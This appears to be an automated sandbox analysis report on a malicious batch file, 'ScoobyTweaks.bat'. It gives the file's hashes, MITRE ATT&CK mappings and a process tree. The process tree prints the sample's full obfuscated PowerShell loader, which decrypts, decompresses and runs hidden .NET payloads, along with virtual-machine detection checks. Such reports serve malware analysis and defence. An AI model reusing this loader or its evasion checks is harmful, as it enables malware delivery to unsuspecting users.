7bf1cb8256c2f6c4866673d450bb64ff92508e73bf18c732c116615bdb7aaf62

General

Target

ScoobyTweaks.bat
Size

7.4MB
MD5

dc341c4ec7fe7d3e81d7bca145454b0c
SHA1

b86edef88c3fd8da25c57b1df0e732ba63935731
SHA256

7bf1cb8256c2f6c4866673d450bb64ff92508e73bf18c732c116615bdb7aaf62
SHA512

45f87adb3f1339dbb091ae9ba6cc4db5eac9756d3fd00e92205b8d209ba393e6350f212e7561720fcf1220e76c7f785c5a68bfe62491d0f0bbf62dd1ee27822a
SSDEEP

49152:67z4Jsqm6fKiR3zbC83bKA3EHzpMHIsMA3zL32CIe3teYdc4Sp9XvGcUNGj5Wg9O:H

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
276	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
276	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	276	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2236 wrote to memory of 928	2236	cmd.exe	30
PID 2236 wrote to memory of 928	2236	cmd.exe	30
PID 2236 wrote to memory of 928	2236	cmd.exe	30
PID 2236 wrote to memory of 932	2236	cmd.exe	31
PID 2236 wrote to memory of 932	2236	cmd.exe	31
PID 2236 wrote to memory of 932	2236	cmd.exe	31
PID 2236 wrote to memory of 2260	2236	cmd.exe	32
PID 2236 wrote to memory of 2260	2236	cmd.exe	32
PID 2236 wrote to memory of 2260	2236	cmd.exe	32
PID 2236 wrote to memory of 2592	2236	cmd.exe	33
PID 2236 wrote to memory of 2592	2236	cmd.exe	33
PID 2236 wrote to memory of 2592	2236	cmd.exe	33
PID 2236 wrote to memory of 2548	2236	cmd.exe	34
PID 2236 wrote to memory of 2548	2236	cmd.exe	34
PID 2236 wrote to memory of 2548	2236	cmd.exe	34
PID 2236 wrote to memory of 276	2236	cmd.exe	35
PID 2236 wrote to memory of 276	2236	cmd.exe	35
PID 2236 wrote to memory of 276	2236	cmd.exe	35

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\ScoobyTweaks.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2236
- C:\Windows\system32\fsutil.exe
  fsutil fsinfo drives
  2⤵
  PID:928
- C:\Windows\system32\findstr.exe
  findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
  2⤵
  PID:932
- C:\Windows\system32\fsutil.exe
  fsutil fsinfo drives
  2⤵
  PID:2260
- C:\Windows\system32\findstr.exe
  findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
  2⤵
  PID:2592
- C:\Windows\system32\cmd.exe
  cmd.exe /c echo function HRHY($PTKg){ Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose -Debug '$rIxC=QC[QCSQCyQCsQCteQCm.QCSeQCcuQCrQCiQCtQCy.QCCQCrQCyQCpQCtoQCgQCraQCpQChQCyQC.AQCeQCsQC]QC::QCCQCreQCaQCteQC(QC);'.Replace('QC', ''); Invoke-Expression -WarningAction Inquire -Verbose -InformationAction Ignore -Debug '$rIxC.YMMYMoYMdYMeYM=[YMSyYMstYMemYM.YMSYMeYMcuYMrYMiYMtYMyYM.CYMrYMypYMtYMoYMgYMraYMpYMhYMyYM.CYMiYMphYMeYMrMYMoYMdYMe]YM:YM:CYMBCYM;'.Replace('YM', ''); Invoke-Expression -Verbose -Debug -WarningAction Inquire '$rIxC.NlPNlaNldNldNlinNlg=Nl[SNlysNltNleNlmNl.SNleNlcNluNlrNlitNlyNl.CNlrNlyNlpNltoNlgNlrNlaNlphNlyNl.PNlaNlddNliNlnNlgMNloNldeNl]:Nl:NlPKNlCSNl7Nl;'.Replace('Nl', ''); Invoke-Expression -Debug -Verbose -InformationAction Ignore '$rIxC.WJKWJeWJyWJ=WJ[SWJysWJteWJm.WJCWJoWJnWJveWJrWJtWJ]WJ:WJ:FWJrWJomWJBWJaWJsWJe6WJ4WJSWJtWJriWJnWJg("WJfWJTWJHWJDWJP/WJbfWJUgWJfmWJcWJFWJtWJ7CWJlWJEWJHWJBWJdGWJ1WJr4WJJWJLWJlWJdnWJgWJcWJPWJRmWJKWJqQWJVWJb/WJMWJ=");'.Replace('WJ', ''); Invoke-Expression -Verbose '$rIxC.rVIrVVrV=rV[rVSyrVstrVemrV.CrVorVnrVvrVerrVtrV]rV:rV:rVFrrVorVmBrVarVsrVerV64rVSrVtrVrrVinrVg("rV+rVZrVIrVArVZnrVqhrVUSrVCYrVvrVnrVUrV+9rVarVSrV+rVPrVQ=rV=");'.Replace('rV', ''); $oUbM=$rIxC.CreateDecryptor(); $cwxE=$oUbM.TransformFinalBlock($PTKg, 0, $PTKg.Length); $oUbM.Dispose(); $rIxC.Dispose(); $cwxE;}function FXwV($PTKg){ Invoke-Expression -Debug -Verbose -InformationAction Ignore -WarningAction Inquire '$tDoN=leNleelewle-leOblejelectle Sleylesletleemle.leIleOle.leMelemleorleyleSletlerelealemle(,$PTKg);'.Replace('le', ''); Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore '$XtCF=leNleelewle-leOblejelectle Sleylesletleemle.leIleOle.leMelemleorleyleSletlerelealemle;'.Replace('le', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$vjrb=LQNLQeLQwLQ-LQObLQjeLQctLQ SLQyLQsLQtLQemLQ.LQILQOLQ.LQCoLQmLQprLQeLQsLQsLQioLQnLQ.LQGLQZiLQpLQStLQrLQeaLQmLQ($tDoN, LQ[LQILQOLQ.LQCoLQmpLQreLQssLQiLQoLQnLQ.CLQoLQmLQpLQrLQesLQsLQioLQnLQMLQoLQdeLQ]LQ:LQ:LQDeLQcLQomLQpLQreLQsLQs);'.Replace('LQ', ''); $vjrb.CopyTo($XtCF); $vjrb.Dispose(); $tDoN.Dispose(); $XtCF.Dispose(); $XtCF.ToArray();}function KPVu($PTKg,$Mzdr){ Invoke-Expression -Verbose -InformationAction Ignore -Debug -WarningAction Inquire '$bXPy=KR[KRSKRyKRsKRteKRm.KRReKRflKReKRcKRtKRioKRnKR.KRAKRsKRseKRmKRblKRyKR]KR:KR:LKRoKRaKRd([byte[]]$PTKg);'.Replace('KR', ''); Invoke-Expression -InformationAction Ignore -Debug '$gPPl=$bXPy.PEEPEnPEtPErPEyPPEoiPEntPE;'.Replace('PE', ''); Invoke-Expression -InformationAction Ignore -Verbose -Debug '$gPPlIW.IWIIWnIWvIWokIWe(IW$nIWulIWlIW, $Mzdr);'.Replace('IW', '');}$bSII = 'C:\Users\Admin\AppData\Local\Temp\ScoobyTweaks.bat';$host.UI.RawUI.WindowTitle = $bSII;$xXmm=[System.IO.File]::ReadAllText($bSII).Split([Environment]::NewLine);foreach ($uKjW in $xXmm) { if ($uKjW.StartsWith('bvrJu')) { $QpGZ=$uKjW.Substring(5); break; }}$Kkal=[string[]]$QpGZ.Split('\');Invoke-Expression -Verbose -WarningAction Inquire '$Pfo = FXwV (HRHY (ER[ERCERoERnERveERrtER]:ER:FERrERoERmERBaERsEReER6ER4ERStERrERinERgER($Kkal[0].Replace("#", "/").Replace("@", "A"))));'.Replace('ER', '');Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose -Debug '$yDU = FXwV (HRHY (ER[ERCERoERnERveERrtER]:ER:FERrERoERmERBaERsEReER6ER4ERStERrERinERgER($Kkal[1].Replace("#", "/").Replace("@", "A"))));'.Replace('ER', '');Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug '$Kev = FXwV (HRHY (ER[ERCERoERnERveERrtER]:ER:FERrERoERmERBaERsEReER6ER4ERStERrERinERgER($Kkal[2].Replace("#", "/").Replace("@", "A"))));'.Replace('ER', '');KPVu $Pfo $null;KPVu $yDU $null;KPVu $Kev (,[string[]] (''));
  2⤵
  PID:2548
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -WindowStyle Hidden
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:276

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/276-4-0x000007FEF67BE000-0x000007FEF67BF000-memory.dmp

Filesize
4KB

Download
memory/276-5-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/276-8-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/276-7-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/276-10-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/276-9-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/276-6-0x000000001B290000-0x000000001B572000-memory.dmp

Filesize
2.9MB

Download
memory/276-11-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/276-12-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/276-13-0x000007FEF67BE000-0x000007FEF67BF000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing